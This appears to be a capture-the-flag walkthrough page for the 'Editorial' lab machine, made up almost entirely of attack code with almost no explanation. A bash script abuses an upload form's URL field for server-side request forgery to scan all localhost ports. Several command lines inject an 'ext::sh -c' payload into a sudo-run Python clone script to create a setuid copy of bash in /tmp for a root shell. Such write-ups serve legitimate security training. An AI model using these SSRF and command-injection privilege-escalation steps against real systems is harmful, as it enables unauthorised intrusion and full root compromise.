Editorial
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c 'cp /bin/bash /tmp/rootbash && chmod 4755 /tmp/rootbash'"
ext::sh -c "cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash"
ext::sh -c 'cp /bin/bash /tmp/rootbash&&chmod+4755+/tmp/rootbash'
python3 clone_prod_change.py "ext::sh -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'"
// Some code
#!/bin/bash
# Target host
TARGET_HOST="editorial.htb"
UPLOAD_ENDPOINT="http://$TARGET_HOST/upload-cover"
# Headers for the request
USER_AGENT="Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0"
CONTENT_TYPE="multipart/form-data; boundary=---------------------------396747637542515860132877623504"
BOUNDARY="-----------------------------396747637542515860132877623504"
# Loop through all ports from 1 to 65535
for PORT in {1..65535}
do
echo "[*] Testing port $PORT"
# Construct the POST data
POST_DATA="\
$BOUNDARY\r\n\
Content-Disposition: form-data; name=\"bookurl\"\r\n\r\n\
http://localhost:$PORT\r\n\
$BOUNDARY\r\n\
Content-Disposition: form-data; name=\"bookfile\"; filename=\"\"\r\n\
Content-Type: application/octet-stream\r\n\r\n\
$BOUNDARY--\r\n"
# Make the POST request using curl
RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$UPLOAD_ENDPOINT" \
-H "Host: $TARGET_HOST" \
-H "User-Agent: $USER_AGENT" \
-H "Accept: */*" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate, br" \
-H "Referer: http://$TARGET_HOST/upload" \
-H "Content-Type: $CONTENT_TYPE" \
-H "Origin: http://$TARGET_HOST" \
-H "DNT: 1" \
-H "Connection: close" \
-H "Sec-GPC: 1" \
--data-binary "$POST_DATA")
# Check if response is not 404 or 500
if [[ "$RESPONSE" != "404" && "$RESPONSE" != "500" ]]; then
echo "[+] Possible active service on port $PORT (HTTP Status: $RESPONSE)"
fi
done
echo "[*] Scan completed."Last updated
Was this helpful?